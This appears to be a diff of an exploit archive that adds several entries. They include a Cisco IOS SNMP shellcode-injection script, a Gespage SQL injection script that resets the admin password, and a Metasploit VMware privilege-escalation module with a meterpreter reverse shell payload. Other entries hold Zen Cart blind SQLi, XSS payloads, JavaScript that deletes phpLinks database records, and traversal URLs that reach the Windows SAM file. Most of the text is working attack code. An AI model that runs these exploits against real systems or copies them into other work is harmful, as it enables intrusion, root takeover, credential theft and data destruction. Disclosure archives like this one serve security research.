$ sudo python c2800nm-adventerprisek9-mz.151-4.M12a.py 192.168.88.1 public 8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb60000000000003c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000
Writing shellcode to 0x8000f000
.
Sent 1 packets.
0x8000f0a4: 8fb40250 lw $s4, 0x250($sp)
.
Sent 1 packets.
0x8000f0a8: 00000000 nop
.
Sent 1 packets.
0x8000f0ac: 3c163e29 lui $s6, 0x3e29
.
Sent 1 packets.
0x8000f0b0: 36d655b0 ori $s6, $s6, 0x55b0
```
Notes
-----------
Firmware verson can be read via snmpget command:
```
$ snmpget -v 2c -c public 192.168.88.1 1.3.6.1.2.1.1.1.0
SNMPv2-MIB::sysDescr.0 = STRING: Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Tue 04-Oct-16 03:37 by prod_rel_team
```
Author
------
Artem Kondratenko https://twitter.com/artkond
## Shellcode
8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb60000000000003c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000
## unset_shellcode
8fb40250000000003c163e2936d655b026d620000000000002d4a821000000003c1480003694f0008e96000000000000aeb60000000000003c1fbfc437ff89a803e0000800000000
'''
from scapy.all import *
from time import sleep
from struct import pack, unpack
import random
import argparse
import sys
from termcolor import colored
try:
cs = __import__('capstone')
except ImportError:
pass
def bin2oid(buf):
return ''.join(['.' + str(unpack('B',x)[0]) for x in buf])
def shift(s, offset):
res = pack('>I', unpack('>I', s)[0] + offset)
return res
alps_oid = '1.3.6.1.4.1.9.9.95.1.3.1.1.7.108.39.84.85.195.249.106.59.210.37.23.42.103.182.75.232.81{0}{1}{2}{3}{4}{5}{6}{7}.14.167.142.47.118.77.96.179.109.211.170.27.243.88.157.50{8}{9}.35.27.203.165.44.25.83.68.39.22.219.77.32.38.6.115{10}{11}.11.187.147.166.116.171.114.126.109.248.144.111.30'
shellcode_start = '\x80\x00\xf0\x00'
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("host", type=str, help="host IP")
parser.add_argument("community", type=str, help="community string")
parser.add_argument("shellcode", action='store', type=str, help='shellcode to run (in hex)')
args = parser.parse_args()
sh_buf = args.shellcode.replace(' ','').decode('hex')
print 'Writing shellcode to 0x{}'.format(shellcode_start.encode('hex'))
if 'capstone' in sys.modules:
md = cs.Cs(cs.CS_ARCH_MIPS, cs.CS_MODE_MIPS32 | cs.CS_MODE_BIG_ENDIAN)
for k, sh_dword in enumerate([sh_buf[i:i+4] for i in range(0, len(sh_buf), 4)]):
s0 = bin2oid(sh_dword) # shellcode dword
s1 = bin2oid('\x00\x00\x00\x00')
s2 = bin2oid('\xBF\xC5\xB7\xDC')
s3 = bin2oid('\x00\x00\x00\x00')
s4 = bin2oid('\x00\x00\x00\x00')
s5 = bin2oid('\x00\x00\x00\x00')
s6 = bin2oid('\x00\x00\x00\x00')
ra = bin2oid('\xbf\xc2\x2f\x60') # return control flow jumping over 1 stack frame
s0_2 = bin2oid(shift(shellcode_start, k * 4))
ra_2 = bin2oid('\xbf\xc7\x08\x60')
s0_3 = bin2oid('\x00\x00\x00\x00')
ra_3 = bin2oid('\xBF\xC3\x86\xA0')
payload = alps_oid.format(s0, s1, s2, s3, s4, s5, s6, ra, s0_2, ra_2, s0_3, ra_3)
send(IP(dst=args.host)/UDP(sport=161,dport=161)/SNMP(community=args.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)])))
cur_addr = unpack(">I",shift(shellcode_start, k * 4 + 0xa4))[0]
if 'capstone' in sys.modules:
for i in md.disasm(sh_dword, cur_addr):
color = 'green'
print("0x%x:\t%s\t%s\t%s" %(i.address, sh_dword.encode('hex'), colored(i.mnemonic, color), colored(i.op_str, color)))
else:
print("0x%x:\t%s" %(cur_addr, sh_dword.encode('hex')))
sleep(1)
ans = raw_input("Jump to shellcode? [yes]: ")
if ans == 'yes':
ra = bin2oid(shift(shellcode_start, 0xa4)) # return control flow jumping over 1 stack frame
zero = bin2oid('\x00\x00\x00\x00')
payload = alps_oid.format(zero, zero, zero, zero, zero, zero, zero, ra, zero, zero, zero, zero)
send(IP(dst=args.host)/UDP(sport=161,dport=161)/SNMP(community=args.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)])))
print 'Jump taken!'

227
exploits/jsp/webapps/43447.txt Normal file
View file

@ -0,0 +1,227 @@
# [CVE-2017-7997] Gespage SQL Injection vulnerability
## Description
Gespage is a web solution providing a printer portal. Official Website:
http://www.gespage.com/
The web application does not properly filter several parameters sent by
users, allowing authenticated SQL code injection (Stacked Queries -
comment).
These vulnerabilities could allow attackers to retrieve / update data
from the database through the application.
**CVE ID**: CVE-2017-7997
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-89
**CVSS Base Score**: 8.6
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
### Proof of Concept (dumping database data)
The parameters of these following pages are vulnerable:
* Page: http://URL/ges/webapp/users/prnow.jsp
Parameter: show_prn
HTTP Method: Post
* Page: http://URL/ges/webapp/users/blhistory.jsp
Parameter: show_month
HTTP Method: Post
* Page: http://URL/ges/webapp/users/prhistory.jsp
Parameter: show_month
HTTP Method: Post
We can then detect the SQL Injection by requesting the server with the
curl tool, including a simple payload executing a sleep of different
seconds:
* Normal request:
```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d "show_prn=1"
https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure -w
"\nResponse Time:%{time_total}\n"
Curl output: Response Time:0,122
```
* Sleep Injection of 3 seconds into the request:
```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d
"show_prn=1');SELECT PG_SLEEP(3)--"
https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure -w
"\nResponse Time:%{time_total}\n"
Curl output: Response Time: 3,126
```
* Sleep Injection of 6 seconds into the request:
```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d
"show_prn=1');SELECT PG_SLEEP(6)--"
https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure -w
"\nResponse Time:%{time_total}\n"
Curl output: Response Time: 6,126
```
We created a dedicated python script to change the web admin password in
order to compromise the web application:
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
$ python update_gespage_pwd.py -c e06d40bc855c98751a5a2ff49daa -i
http://192.168.160.128:7180/gespage -p 12345
[+] Generating the new admin password hash
=> Password hash (sha1) to inject in the Database:
8cb2237d0679ca88db6464eac60da96345513964
[+] Verifying connection to the web interface:
http://192.168.160.128:7180/gespage/
=> Connection OK
[+] Exploiting the SQL injection
=> Vulnerable page:
http://192.168.160.128:7180/gespage/webapp/users/prnow.jsp
=> Posting Data : show_prn=A-PRINTER-ON-THE-WEB-LIST');UPDATE
param_gespage SET param_value='8cb2237d0679ca88db6464eac60da96345513964'
WHERE param_id='admin_pwd'--
[+] Go to the web admin interface, http://192.168.160.128:7180/admin/
and log on with admin:12345
"""
from argparse import ArgumentParser
from hashlib import sha1
from requests import Session
from urllib3 import disable_warnings
def exploit(args):
if args.ip_url[-1] != "/":
args.ip_url += "/"
print "[+] Generating the new admin password hash"
new_admin_pwd_hash = sha1(args.password).hexdigest()
print " => Password hash (sha1) to inject in the Database: %s" %
(new_admin_pwd_hash)
print "[+] Verifying connection to the web interface: %s" %
(args.ip_url)
web_session = web_connection(args.ip_url, args.cookie)
print "[+] Exploiting the SQL injection"
sql_injection(args.ip_url, web_session, args.cookie, new_admin_pwd_hash)
print "[+] Go to the web admin interface, %s and log on with
admin:%s" % (args.ip_url.replace('gespage', 'admin'), args.password)
def sql_injection(url, session, user_cookie, new_admin_pwd_hash):
vulnerable_url = url + "webapp/users/prnow.jsp"
sql_update_query = "UPDATE param_gespage SET param_value='%s' WHERE
param_id='admin_pwd'" % (new_admin_pwd_hash)
sql_injection_payload = "A-PRINTER-ON-THE-WEB-LIST');%s--" %
(sql_update_query)
print " => Vulnerable page: %s" % (vulnerable_url)
print " => Posting Data : show_prn=%s" %(sql_injection_payload)
response = session.post(vulnerable_url,
cookies={"JSESSIONID":user_cookie}, verify=False, allow_redirects=True,
data={"show_prn":sql_injection_payload})
if not response.status_code == 200:
print " There is an error while posting the payload, try with
sqlmap.py"
exit(2)
def web_connection(url, user_cookie):
disable_warnings()
session = Session()
response = session.get(url, verify=False, allow_redirects=False,
cookies={"JSESSIONID":user_cookie})
if (response.status_code == 302 and "webapp/user_main.xhtml" in
response.text):
print " => Connection OK"
return session
else:
print " /!\ Error while connecting the web interface with the
specified JSESSIONID cookie"
print " => Make sure given application URL and JSESSIONID
cookie are correct "
exit(1)
if __name__ == '__main__':
parser = ArgumentParser(description='Exploit Gespage SQL injection
by updating the admin password. You must create then specify an existing
user in order to exploit the vulnerability')
parser.add_argument('-i','--ip_url', help='The web interface URL,
ex: http://IP_ADDRESS:7181/gespage/',required=True)
parser.add_argument('-c','--cookie', help='JSESSIONID cookie of an
authenticated user',required=True)
parser.add_argument('-p','--password', help='New admin
password',required=True)
exploit(parser.parse_args())
```
Using [sqlmap](https://github.com/sqlmapproject/sqlmap), it is also
possible to dump the content of the database, write other data, etc.
Dumping the admin password hash (if changed from the initial 123456
password):
```
python sqlmap.py -u "https://URL:7181/gespage/users/prnow.jsp"
--cookie="JSESSIONID=YOUR_COOKIE_HERE"
--data="show_prn=A-PRINTER-ON-THE-WEB-LIST" --dbms=PostgreSQL --risk 3
--level 5 --technique TS -D public -T param_gespage -C param_value
--time-sec 2 --dump --flush-session
```
Dumping the users table:
```
sqlmap.py -u "https://URL:7181/gespage/users/prnow.jsp"
--cookie="JSESSIONID=YOU_COOKIE_HERE"
--data="show_prn=A-PRINTER-ON-THE-WEB-LIST" --dbms=PostgreSQL --risk 3
--level 5 --technique TS -D public -T users --time-sec 2 --dump
```
## Timeline (dd/mm/yyyy)
* 06/03/2017 : Initial discovery
* 13/03/2017 : First contact attempt (Web form)
* 21/04/2017 : Second contact attempt (public e-mail address)
* 23/06/2017 : Phone call and successful e-mail contact
* 23/06/2017 : Technical details sent to the editor
* 20/07/2017 : No reply, follow-up e-mail
* 27/07/2017 : Reply: fix planned for major release 7.5.0 in late September
* 17/09/2017 : Informing the editor that we would publish in October
* 3/10/2017 : Feedback from Gespage informing us that the issue has been
fixed with version 7.4.9.
* 02/01/2018 : Release of the advisory
## Fixes
Upgrade to Gespage 7.4.9
## Affected versions
* Versions up to 7.4.8
## Credits
* Mickael KARATEKIN <m.karatekin@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream

261
exploits/linux/local/43449.rb Executable file
View file

@ -0,0 +1,261 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'VMware Workstation ALSA Config File Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in VMware Workstation Pro and
Player on Linux which allows users to escalate their privileges by
using an ALSA configuration file to load and execute a shared object
as root when launching a virtual machine with an attached sound card.
This module has been tested successfully on VMware Player version
12.5.0 on Debian Linux.
},
'References' =>
[
[ 'CVE', '2017-4915' ],
[ 'EDB', '42045' ],
[ 'BID', '98566' ],
[ 'URL', 'https://gist.github.com/bcoles/cd26a831473088afafefc93641e184a9' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2017-0009.html' ],
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1142' ]
],
'License' => MSF_LICENSE,
'Author' =>
[
'Jann Horn', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'DisclosureDate' => 'May 22 2017',
'Platform' => 'linux',
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultOptions' =>
{
'Payload' => 'linux/x64/meterpreter_reverse_tcp',
'WfsDelay' => 30,
'PrependFork' => true
},
'DefaultTarget' => 1,
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Privileged' => true ))
register_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def has_prereqs?
vmplayer = cmd_exec 'which vmplayer'
if vmplayer.include? 'vmplayer'
vprint_good 'vmplayer is installed'
else
print_error 'vmplayer is not installed. Exploitation will fail.'
return false
end
gcc = cmd_exec 'which gcc'
if gcc.include? 'gcc'
vprint_good 'gcc is installed'
else
print_error 'gcc is not installed. Compiling will fail.'
return false
end
true
end
def check
unless has_prereqs?
print_error 'Target missing prerequisites'
return CheckCode::Safe
end
begin
config = read_file '/etc/vmware/config'
rescue
config = ''
end
if config =~ /player\.product\.version\s*=\s*"([\d\.]+)"/
@version = Gem::Version.new $1.gsub(/\.$/, '')
vprint_status "VMware is version #{@version}"
else
print_error "Could not determine VMware version."
return CheckCode::Unknown
end
if @version < Gem::Version.new('12.5.6')
print_good 'Target version is vulnerable'
return CheckCode::Vulnerable
end
print_error 'Target version is not vulnerable'
CheckCode::Safe
end
def exploit
if check == CheckCode::Safe
print_error 'Target machine is not vulnerable'
return
end
@home_dir = cmd_exec 'echo ${HOME}'
unless @home_dir
print_error "Could not find user's home directory"
return
end
@prefs_file = "#{@home_dir}/.vmware/preferences"
fname = ".#{rand_text_alphanumeric rand(10) + 5}"
@base_dir = "#{datastore['WritableDir']}/#{fname}"
cmd_exec "mkdir #{@base_dir}"
so = %Q^
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142
Original shared object code by jhorn
*/
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <err.h>
extern char *program_invocation_short_name;
__attribute__((constructor)) void run(void) {
uid_t ruid, euid, suid;
if (getresuid(&ruid, &euid, &suid))
err(1, "getresuid");
if (ruid == 0 || euid == 0 || suid == 0) {
if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
err(1, "setresxid");
system("#{@base_dir}/#{fname}.elf");
_exit(0);
}
}
^
vprint_status "Writing #{@base_dir}/#{fname}.c"
write_file "#{@base_dir}/#{fname}.c", so
vprint_status "Compiling #{@base_dir}/#{fname}.o"
output = cmd_exec "gcc -fPIC -shared -o #{@base_dir}/#{fname}.so #{@base_dir}/#{fname}.c -Wall -ldl -std=gnu99"
unless output == ''
print_error "Compilation failed: #{output}"
return
end
vmx = %Q|
.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "8"
scsi0.present = "FALSE"
memsize = "4"
ide0:0.present = "FALSE"
sound.present = "TRUE"
sound.fileName = "-1"
sound.autodetect = "TRUE"
vmci0.present = "FALSE"
hpet0.present = "FALSE"
displayName = "#{fname}"
guestOS = "other"
nvram = "#{fname}.nvram"
virtualHW.productCompatibility = "hosted"
gui.exitOnCLIHLT = "FALSE"
powerType.powerOff = "soft"
powerType.powerOn = "soft"
powerType.suspend = "soft"
powerType.reset = "soft"
floppy0.present = "FALSE"
monitor_control.disable_longmode = 1
|
vprint_status "Writing #{@base_dir}/#{fname}.vmx"
write_file "#{@base_dir}/#{fname}.vmx", vmx
vprint_status "Writing #{@base_dir}/#{fname}.elf"
write_file "#{@base_dir}/#{fname}.elf", generate_payload_exe
vprint_status "Setting #{@base_dir}/#{fname}.elf executable"
cmd_exec "chmod +x #{@base_dir}/#{fname}.elf"
asoundrc = %Q|
hook_func.pulse_load_if_running {
lib "#{@base_dir}/#{fname}.so"
func "conf_pulse_hook_load_if_running"
}
|
vprint_status "Writing #{@home_dir}/.asoundrc"
write_file "#{@home_dir}/.asoundrc", asoundrc
vprint_status 'Disabling VMware hint popups'
unless directory? "#{@home_dir}/.vmware"
cmd_exec "mkdir #{@home_dir}/.vmware"
@remove_prefs_dir = true
end
if file? @prefs_file
begin
prefs = read_file @prefs_file
rescue
prefs = ''
end
end
if prefs.blank?
prefs = ".encoding = \"UTF8\"\n"
prefs << "pref.vmplayer.firstRunDismissedVersion = \"999\"\n"
prefs << "hints.hideAll = \"TRUE\"\n"
@remove_prefs_file = true
elsif prefs =~ /hints\.hideAll/i
prefs.gsub!(/hints\.hideAll.*$/i, 'hints.hideAll = "TRUE"')
else
prefs.sub!(/\n?\z/, "\nhints.hideAll = \"TRUE\"\n")
end
vprint_status "Writing #{@prefs_file}"
write_file "#{@prefs_file}", prefs
print_status 'Launching VMware Player...'
cmd_exec "vmplayer #{@base_dir}/#{fname}.vmx"
end
def cleanup
print_status "Removing #{@base_dir} directory"
cmd_exec "rm '#{@base_dir}' -rf"
print_status "Removing #{@home_dir}/.asoundrc"
cmd_exec "rm '#{@home_dir}/.asoundrc'"
if @remove_prefs_dir
print_status "Removing #{@home_dir}/.vmware directory"
cmd_exec "rm '#{@home_dir}/.vmware' -rf"
elsif @remove_prefs_file
print_status "Removing #{@prefs_file}"
cmd_exec "rm '#{@prefs_file}' -rf"
end
end
def on_new_session(session)
# if we don't /bin/sh here, our payload times out
session.shell_command_token '/bin/sh'
super
end
end

46
exploits/linux/webapps/43436.txt Normal file
View file

@ -0,0 +1,46 @@
Zen Cart SQL Injection
Vendor: Zen Ventures, LLC
Product: Zen Cart
Version: <= 1.3.8a
Website: http://www.zen-cart.com
BID: 31023
CVE: CVE-2008-6985
OSVDB: 48346
SECUNIA: 31758
PACKETSTORM: 69640
Description:
Zen Cart is a full featured open source ecommerce web application written in php that allows users to build, run and promote their own online store. Unfortunately there are multiple SQL Injection issues in Zen Cart that may allow an attacker to execute arbitrary SQL queries on the underlying database. This may allow for an attacker to gather username and password information, among other things. An updated version of Zen Cart has been released to address these issues and users are encouraged to upgrade as soon as possible.
SQL Injection
There are a couple of SQL Injection issues within Zen Cart that may allow for a malicious attacker to execute arbitrary SQL queries, and gather arbitrary data from the database. The first issue is due to product attribute values not being properly sanitized (particularly the value of certain "id" parameters) when adding to or updating the shopping cart. The queries that are vulnerable to SQL injection can either be an update query, or an insert query depending on current shopping cart state and whether or not the customer is logged in. However, Zen Cart installations running with a database that supports sub selects are vulnerable to exploitation. Otherwise the issue is limited in regards to it's ability to be exploited.
function actionMultipleAddProduct($goto, $parameters) {
global $messageStack;
if (is_array($_POST['products_id']) && sizeof($_POST['products_id']) > 0) {
foreach($_POST['products_id'] as $key=>$val) {
// while ( list( $key, $val ) = each($_POST['products_id']) ) {
if ($val > 0) {
$adjust_max = false;
$prodId = $key;
$qty = $val;
$add_max = zen_get_products_quantity_order_max($prodId);
$cart_qty = $this->in_cart_mixed($prodId);
The above code comes from the actionMultipleAddProduct function in the shopping_cart class, and unlike the first issue I discussed introduces a highly exploitable SQL Injection issue in to Zen Cart. The root of the problem is that the in_cart_mixed function uses $prodId in a query without any sanitation.
products_id[-99' UNION SELECT IF(SUBSTRING(admin_pass,1, 1) = CHAR(97), BENCHMARK
(1000000, MD5(CHAR(1))), null),2 FROM zencart_admin/*]
It's possible for an attacker to submit a request to the "multiple_products_add_product" action with a products_id like the one above (remember to set the value to one if you wish to test this) and successfully enumerate database contents based on query response time. Of course other attacks may be possible also depending on server configuration. For example, if an attacker select INTO OUTFILE then this issue can allow for remote php code execution.
Solution:
The Zen Cart developers were very prompt and professional in releasing a fix for the previously mentioned issues. An updated version, as well as patches can be found at the following location.
http://www.zen-cart.com/forum/showthread.php?p=604473
Credits:
James Bercegay of the GulfTech Security Research Team

7
exploits/multiple/local/43427.c
View file

@ -1,3 +1,10 @@
/*
EDB Note:
- https://spectreattack.com/
- https://spectreattack.com/spectre.pdf
- https://googleprojectzero.blogspot.co.at/2018/01/reading-privileged-memory-with-side.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

48
exploits/multiple/webapps/43437.txt Normal file
View file

@ -0,0 +1,48 @@
PHP Topsites Multiple Vulnerabilities
Vendor: iTop 10
Product: PHP Topsites
Version: <= 2.2
Website: http://www.itop10.net/
BID: 6621 6622 6623 6625
Description:
PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.
Script Injection Vulnerability:
An HTML injection vulnerability has been discovered in PHP TopSites. The issue occurs due to insufficient sanitization of user-supplied data. By injecting HTML code into the <body> tag of the description page, when submitting website, it may be possible to cause an administrator to edit or delete database entries. This issue will occur when an unsuspecting administrator loads the submitted description. This vulnerability also affects the 'edit.php' script.
Cross Site Scripting Vulnerability:
A vulnerability has been discovered in PHP TopSites. Due to invalid sanitization of user-supplied input by the 'help.php' script, it may be possible for an attacker to steal another users cookie information or other sensitive data. This issue can be exploited by constructing a malicious URL containing embedded script code as a 'help.php' parameter. When an unsuspecting user follows the link sensitive information, such as cookie-based authentication credentials may be obtained by the attacker.
Plaintext Password Weakness:
A weakness has been discovered in PHP TopSites. It has been reported that user's passwords are stored in plaintext and thus are visible to TopSites administrators. This poses a security risk as TopSite script users may use the same passwords on other systems.
SQL Injection Vulnerability:
A vulnerability has been discovered in PHP TopSites. Due to insufficient sanitization of user-supplied URI parameters it is possible for an attacker to embed SQL commands into certain page requests. This may result in database information being disclose to an attacker.
Solution:
Upgrade to the current version of php topsites
Proof Of Conecpt Exploit:
iTop10.net phpTopsites Proof Of Concept
Credits:
James Bercegay of the GulfTech Security Research Team. And The CyberArmy ACAT Team.
- https://www.securityfocus.com/bid/6625/info
http://examplewebsite.com/topsitesdirectory/edit.php?a=pre&submit=&sid=siteidnumber--
- https://www.securityfocus.com/bid/6623/info
- https://www.securityfocus.com/bid/6622/info
http://www.example.com/TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>
- https://www.securityfocus.com/bid/6621/info
<body onLoad= "parent.location='http://www.somewebsite.com/TopSitesdirectory/seditor.php?sid=siteidnumber&a=delete'">
<body onLoad="window.open('http://attackerswebsite/launcher.htm')">

92
exploits/multiple/webapps/43438.txt Normal file
View file

@ -0,0 +1,92 @@
phpLinks Multiple Vulnerabilities
Vendor: destiney.com
Product: phpLinks
Version: <= 2.1.2
Website: http://phplinks.sourceforge.net/
BID: 6632 6633
Description:
phpLinks is an open source free PHP script. phpLinks allows you to run a very powerful link farm or search engine. phpLinks has multilevel site categorization, infinite threaded search capabilities and more.
Search Script Injection Vulnerability:
phpLinks is prone to HTML injection due to a vulnerability in the search feature. Search queries are not sufficiently sanitized of HTML and script code. These search queries may potentially be displayed to other users when the most popular searches are viewed. If an attacker includes malicious HTML or script code in these queries, it is possible that the attacker-supplied code may be rendered in the web client software of other users.
Add Site Script Injection Vulnerability:
phpLinks does not sufficiently sanitized HTML and script code supplied via form fields before displaying this data to administrative users. This issue exists in the 'add.php' script, which is used to add sites to the phpLinks system. As a result, an attacker may cause malicious HTML and script code to be executed in the web client of an administrative user who reviews attacker-supplied data submitted when a site is added.
Solution:
http://www.securityfocus.com/bid/6632/solution/
http://www.securityfocus.com/bid/6633/solution/
Proof Of Conecpt Exploit:
phpLinks Arbitrary Command Proof Of Concept
Credits:
James Bercegay of the GulfTech Security Research Team.
- https://www.securityfocus.com/bid/6632/info
Put this in one of the field on "Add Site" form located at
http://blah/phplinks/index.php?show=add&PID=
If you inject the code into the Site Title or Site Url field, the code
will be ran as soon as a logged in administrator views it.
<iframe src=http://blah/death.html></iframe>
Below is the code for the called file "death.html"
---------------------------------------------------------------------------
<script language=JavaScript>
var i = 10; // This is the number of the user ID to start deleting
var BaseURL = "http://victimsite/phplinks/";
window.open(BaseURL + '/admin/reset.php?
reset_in=&reset_out=&search_terms=&referrers=&submit='); // this resets
the database
function Waste()
{
while (i) {
i++;
window.open(BaseURL + 'admin/delete_site.php?dbtable=links&ID=' + i
+ '&sure=Yes');
}
}
</script>
<body onLoad="Waste();">
---------------------------------------------------------------------------
As you can see, that code (when called by a logged in admin validating
sites) is run, the database is in alot of cases going to be left empty. By
the way, the dbtable=links can be changed to dbtable=temp in order to
affect sites not yet approved etc. On the other hand you can add users to
the database and more. Take the following code for example:
<iframe src=http://blah/life.html></iframe>
Below is the code for the called file "life.html":
---------------------------------------------------------------------------
<script language=JavaScript>
var i = 1;
var BaseURL = "http://victimsite/phplinks/";
function Gluttony()
{
while (i) {
i++;
window.open(BaseURL + '/admin/add_site.php?SiteName=JeiAr0wnethTheee' + i
+ '&SiteURL=http://www.b' + i + 'j.orfd&Description=' + i
+'3333333333333333333333333333333333&Category=&Country=Turkey.gif&Email=1@t
.' + i + '&UserName=12345' + i
+ '&Password=12345678&Hint=12345678910&add=' + i + '&sure=Yes');
}
}
</script>
<body onLoad="Gluttony();">
---------------------------------------------------------------------------
- https://www.securityfocus.com/bid/6633/info

29
exploits/multiple/webapps/43440.txt Normal file
View file

@ -0,0 +1,29 @@
P-Synch Multiple Vulnerabilities
Vendor: M-Tech Identity Management Solutions
Product: P-Synch
Version: <= 6.2.5
Website: http://www.psynch.com/
BID: 7740 7745 7747
Description:
P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through: Password Synchronization. Enforcing an enterprise wide password strength policy. Allowing authenticated users to reset their own forgotten passwords and enable their locked out accounts. Streamlining help desk call resolution for password resets. P-Synch is available for both internal use, on the corporate Intranet, as well as for the Internet deployment in B2B and B2C applications.
Path Disclosure Vulnerability:
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=
Script Injection Vulnerability:
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]
File Include Vulnerability:
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file
Solution:
Upgrade to the latest version of P-Synch Password Managment.
Credits:
James Bercegay of the GulfTech Security Research Team.

29
exploits/multiple/webapps/43441.txt Normal file
View file

@ -0,0 +1,29 @@
WinMX Design Error
Vendor: Frontcode Technologies
Product: WinMX
Version: <= 2.6
Website: http://www.winmx.com/
BID: 7771
Description:
WinMX 2.6 is an older version of the popular file sharing client WinMX. While the current version is 3.31, 2.6 still remains quite popular. Especially amongst users on private networks. I believe this is largely due to the fact that 2.6 does not have the option to output .wsx file (WinMX server list files) This helps keep the addresses for private OpenNap servers out of the hands of uninvited users (amongst other reasons).
Problem:
The problems with WinMX 2.6 is that it provides pretty much NO password protection. This can be exploited both locally and remotely. Again, I think all of us have seen the bad habit that most people have of using the same password for multiple accounts etc etc.
Local Exploitation:
There several ways to exploit this issue locally. One is to just edit a particular server, and upon doing so the username and pass are presented in plaintext, and the other way is to open the nservers.dat file in the WinMX directory.
Remote Exploitation:
Even though the passwords are encrypted by such servers as SlavaNap etc, they are passed to the server in plaintext, so any malicious server owner with a packet sniffer can exploit this vuln.
Conclusion:
I realized this issue back when 2.6 was the current release, but never reported it because VERY shortly thereafter a new version of WinMX was available. However with the substantial number of 2.6 users still around I felt it was best that this vulnerability become official, as there is nothing about it on google etc that i was able to find. So to anyone using 2.6 i offer this advice. Do not use a password for WinMX 2.6 that you use for other accounts at the very least. Hope this helps some of the 2.6 users out. Cheers
Solution:
Upgrade to the latest version of WinMX
Credits:
James Bercegay of the GulfTech Security Research Team.

29
exploits/multiple/webapps/43442.txt Normal file
View file

@ -0,0 +1,29 @@
FTP Service Multiple Vulnerabilities
Vendor: Pablo Software Solutions
Product: FTP Service
Version: <= 1.2
Website: http://www.pablovandermeer.nl/ftp_service.html
BID: 7799 7801
Description:
FTPService.exe is a service-version of Pablo's FTP Server. This service enables you to have the FTP server active even when you're not logged into Windows.
Anonymous Access
The anonymous account is by default set to have download access to anything in the C:\ directory. While this can be disabled by simply deleting the anonymous account, it poses a serious threat for anyone not aware of the problem.
ftp://somewhere/windows/repair/sam
In conclusion this application is totally open to complete compromise by default. Vendor was notified and plans on releasing a fix soon.
Plaintext Password Weakness:
User info is stored in users.dat in plaintext. If the anonymous account is present (it is by default) the entire FTP server can be compromised
ftp://somewhere/program files/pablo's ftp service/users.dat
Solution:
Upgrade your version of Pablo FTP Service.
Credits:
James Bercegay of the GulfTech Security Research Team.

28
exploits/multiple/webapps/43443.txt Normal file
View file

@ -0,0 +1,28 @@
MegaBrowser Multiple Vulnerabilities
Vendor: Quality Programming Corporation
Product: MegaBrowser
Version: <= 0.71b
Website: http://www.megabrowser.com
BID: 7802 7803
Description:
Megabrowser is a free standalone program that enables you to host websites and FTP sites by utilizing its powerful advanced peer-to-peer features. You can now host websites and FTP sites without paying any hosting fees. Simply store your sites in the directories of your choice on your laptop or personal computer.
Directory Traversal Vulnerability:
MegaBrowser HTTP server is vulnerable to a directory traversal vulnerability which allows access to any file on the system as well as directory viewing of the root web directory
http://www.someplace.com/../../../../../WINNT/repair/sam
http://www.someplace.com/../
FTP User Enumeration Vulnerability:
While not as serious as the previously mentioned vuln, this still poses a threat as it may allow an attacker to harvest a list of valid FTP usernames on the system.
user blah 530 User can't log in user anonymous 331 Anonymous access allowed, send identity (e-mail name) as password
Solution:
Vendor contacted, but never replied. No known solution.
Credits:
